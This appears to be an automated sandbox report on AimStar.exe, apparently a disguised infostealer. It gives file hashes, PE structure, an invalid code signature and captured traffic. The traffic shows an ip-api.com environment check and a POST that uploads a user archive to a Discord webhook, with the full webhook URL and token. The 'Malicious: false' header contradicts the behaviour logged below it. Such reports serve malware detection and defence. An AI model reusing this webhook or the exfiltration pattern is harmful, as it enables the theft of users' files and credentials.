SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993451774558726
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	AimStar.exe
File size:	8'116'372 bytes
MD5:	9e5a9429bc193ee14ebc1f87201be518
SHA1:	0e3626c6fa7bd68417244bbbb310173e67c42401
SHA256:	85f1d6c7ae21dd89e2421559fd8192ad9d885529eb684786aeda8abc273870bc
SHA512:	082fe5a70fe80df1036da883197b8d2e49cc770f4e9084aacddeda2765a9e12fb27158b84f81b56c20e9a7540a42ef4addd29fe23c45b9d966594d0e28496d77
SSDEEP:	196608:ulD+kdZwfI9jUCBB7m+mKOY7rXwZusooDmhfvsbnTNWa:a5wIHL7HmBYXwYoaUNl
TLSH:	C18633466AC104FAF977A83DD5928A1BCB327E215760DAD7437047B50EB3AF0487A327
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	8f3779697933138e

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67746149 [Tue Dec 31 21:25:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 02:00:00 29/09/2024 01:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F9B58F0EAFCh
dec eax
add esp, 28h
jmp 00007F9B58F0E71Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F9B58F0EEC8h
test eax, eax
je 00007F9B58F0E8C3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F9B58F0E8A7h
dec eax
cmp ecx, eax
je 00007F9B58F0E8B6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F9B58F0E890h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F9B58F0E899h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F9B58F0E8A9h
mov byte ptr [000356F5h], 00000001h
call 00007F9B58F0DFF5h
call 00007F9B58F0F2E0h
test al, al
jne 00007F9B58F0E8A6h
xor al, al
jmp 00007F9B58F0E8B6h
call 00007F9B58F1BDFFh
test al, al
jne 00007F9B58F0E8ABh
xor ecx, ecx
call 00007F9B58F0F2F0h
jmp 00007F9B58F0E88Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F9B58F0E909h
cmp ecx, 01h
jnbe 00007F9B58F0E90Ch
call 00007F9B58F0EE3Eh
test eax, eax
je 00007F9B58F0E8CAh
test ebx, ebx
jne 00007F9B58F0E8C6h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007F9B58F1BBF2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x9aa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7bb44c	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x51000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	9c4e605d8ed2385cc56454530e2b931d	False	0.5243229166666666	data	5.750688168829721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x9aa0	0x9c00	b30423757decac5e1bfc7bfefda7796e	False	0.9547776442307693	data	7.89463412625505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x51000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47150	0x8fbf	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9963042473980271
RT_GROUP_ICON	0x50110	0x14	data	1.05
RT_VERSION	0x50124	0x464	data	0.47153024911032027
RT_MANIFEST	0x50588	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 22:12:04.568263054 CET	49709	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:04.573093891 CET	80	49709	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:04.573196888 CET	49709	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:04.573261976 CET	49709	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:04.578058958 CET	80	49709	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:05.028317928 CET	80	49709	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:05.029081106 CET	49709	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:05.034091949 CET	80	49709	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:05.034171104 CET	49709	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:34.917743921 CET	49824	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:34.922533035 CET	80	49824	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:34.922635078 CET	49824	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:34.922801018 CET	49824	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:34.927536964 CET	80	49824	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:35.406724930 CET	80	49824	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:35.450634003 CET	49824	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:35.627578974 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:35.627604008 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:35.627753019 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:35.652497053 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:35.652518988 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.120944977 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.121474028 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.121491909 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.122355938 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.122412920 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.124187946 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.124249935 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.124536037 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.124543905 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.124605894 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.124635935 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.124726057 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.124759912 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.124885082 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.124922991 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125016928 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125035048 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125078917 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125096083 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125123978 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125138044 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125153065 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125164032 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125196934 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125214100 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125253916 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125261068 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125277996 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125289917 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125334024 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125343084 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125356913 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125363111 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125375986 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125390053 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125425100 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125437975 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125453949 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125459909 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125502110 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125514030 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125519991 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125524044 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125538111 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125546932 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125606060 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125612020 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125629902 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125639915 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.125694990 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125701904 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125715971 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125749111 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125767946 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125775099 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125782013 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125793934 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125827074 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125866890 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125919104 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125927925 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.125951052 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134602070 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.134773016 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134788036 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.134804964 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134816885 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134826899 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134876013 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134891987 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134902000 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134924889 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134969950 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134985924 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.134994030 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.135010004 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.135063887 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.140254021 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.140403986 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.140414000 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.140414953 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.140430927 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.140436888 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.140465975 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.140517950 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.140530109 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.140542030 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.141140938 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.774425983 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.774476051 CET	443	49830	162.159.128.233	192.168.2.5
Jan 1, 2025 22:12:36.774527073 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.775377989 CET	49830	443	192.168.2.5	162.159.128.233
Jan 1, 2025 22:12:36.987446070 CET	49824	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:36.992539883 CET	80	49824	208.95.112.1	192.168.2.5
Jan 1, 2025 22:12:36.992695093 CET	49824	80	192.168.2.5	208.95.112.1
Jan 1, 2025 22:12:46.130522966 CET	53656	53	192.168.2.5	162.159.36.2
Jan 1, 2025 22:12:46.135349035 CET	53	53656	162.159.36.2	192.168.2.5
Jan 1, 2025 22:12:46.135443926 CET	53656	53	192.168.2.5	162.159.36.2
Jan 1, 2025 22:12:46.135471106 CET	53656	53	192.168.2.5	162.159.36.2
Jan 1, 2025 22:12:46.140206099 CET	53	53656	162.159.36.2	192.168.2.5
Jan 1, 2025 22:12:46.588337898 CET	53	53656	162.159.36.2	192.168.2.5
Jan 1, 2025 22:12:46.589961052 CET	53656	53	192.168.2.5	162.159.36.2
Jan 1, 2025 22:12:46.594953060 CET	53	53656	162.159.36.2	192.168.2.5
Jan 1, 2025 22:12:46.595026016 CET	53656	53	192.168.2.5	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 22:12:02.310291052 CET	49310	53	192.168.2.5	1.1.1.1
Jan 1, 2025 22:12:02.319490910 CET	53	49310	1.1.1.1	192.168.2.5
Jan 1, 2025 22:12:04.557157993 CET	52097	53	192.168.2.5	1.1.1.1
Jan 1, 2025 22:12:04.563998938 CET	53	52097	1.1.1.1	192.168.2.5
Jan 1, 2025 22:12:34.909957886 CET	61670	53	192.168.2.5	1.1.1.1
Jan 1, 2025 22:12:34.916692972 CET	53	61670	1.1.1.1	192.168.2.5
Jan 1, 2025 22:12:35.619488955 CET	51881	53	192.168.2.5	1.1.1.1
Jan 1, 2025 22:12:35.626837969 CET	53	51881	1.1.1.1	192.168.2.5
Jan 1, 2025 22:12:46.129982948 CET	53	64598	162.159.36.2	192.168.2.5
Jan 1, 2025 22:12:46.620481968 CET	53	58625	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 22:12:02.310291052 CET	192.168.2.5	1.1.1.1	0x5697	Standard query (0)	skoch-6bauu.in	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:04.557157993 CET	192.168.2.5	1.1.1.1	0x37da	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:34.909957886 CET	192.168.2.5	1.1.1.1	0x15c0	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:35.619488955 CET	192.168.2.5	1.1.1.1	0x8c2a	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 22:12:02.319490910 CET	1.1.1.1	192.168.2.5	0x5697	Name error (3)	skoch-6bauu.in	none	none	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:04.563998938 CET	1.1.1.1	192.168.2.5	0x37da	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:34.916692972 CET	1.1.1.1	192.168.2.5	0x15c0	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:35.626837969 CET	1.1.1.1	192.168.2.5	0x8c2a	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:35.626837969 CET	1.1.1.1	192.168.2.5	0x8c2a	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:35.626837969 CET	1.1.1.1	192.168.2.5	0x8c2a	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:35.626837969 CET	1.1.1.1	192.168.2.5	0x8c2a	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:12:35.626837969 CET	1.1.1.1	192.168.2.5	0x8c2a	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	208.95.112.1	80	7332	C:\Users\user\Desktop\AimStar.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 22:12:04.573261976 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 1, 2025 22:12:05.028317928 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:12:04 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49824	208.95.112.1	80	7332	C:\Users\user\Desktop\AimStar.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 22:12:34.922801018 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 1, 2025 22:12:35.406724930 CET	381	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:12:34 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 29 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49830	162.159.128.233	443	7332	C:\Users\user\Desktop\AimStar.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:12:36 UTC	302	OUT	POST /api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApYaj_fZlIRRuECNHrQlsm0 HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 726812 User-Agent: python-urllib3/2.3.0 Content-Type: multipart/form-data; boundary=156af1f13d18752ec77c0725b357aa90
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 2d 2d 31 35 36 61 66 31 66 31 33 64 31 38 37 35 32 65 63 37 37 63 30 37 32 35 62 33 35 37 61 61 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6b 6f 63 68 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 3a 74 33 3d 21 04 00 00 01 0f e1 e3 87 6f 2e 57 53 11 04 10 27 1c e8 fa 90 19 c7 b3 83 07 5a 88 cf 2f 34 59 60 f4 f0 6d 81 92 0d 5f 15 e6 28 4a 4a b2 1a 60 d3 f0 85 c9 4b 17 74 0c a5 6d a5 47 fd da b7 29 47 fb 5f d2 ba 51 71 9d 8c c0 b5 4e c9 98 cb cf 90 f9 0f 09 81 89 88 43 00 d7 f9 Data Ascii: --156af1f13d18752ec77c0725b357aa90Content-Disposition: form-data; name="file"; filename="Skoch-user.rar"Content-Type: application/octet-streamRar!:t3=!o.WS'Z/4Y`m_(JJ`KtmG)G_QqNC
